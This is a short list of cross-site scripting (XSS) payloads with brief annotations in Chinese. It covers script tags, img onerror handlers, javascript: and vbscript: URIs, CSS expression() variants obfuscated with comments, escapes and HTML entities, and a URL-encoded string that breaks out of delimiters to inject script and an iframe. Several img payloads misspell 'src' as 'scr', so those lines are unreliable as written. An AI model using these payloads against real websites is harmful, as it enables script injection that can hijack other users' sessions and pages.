<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["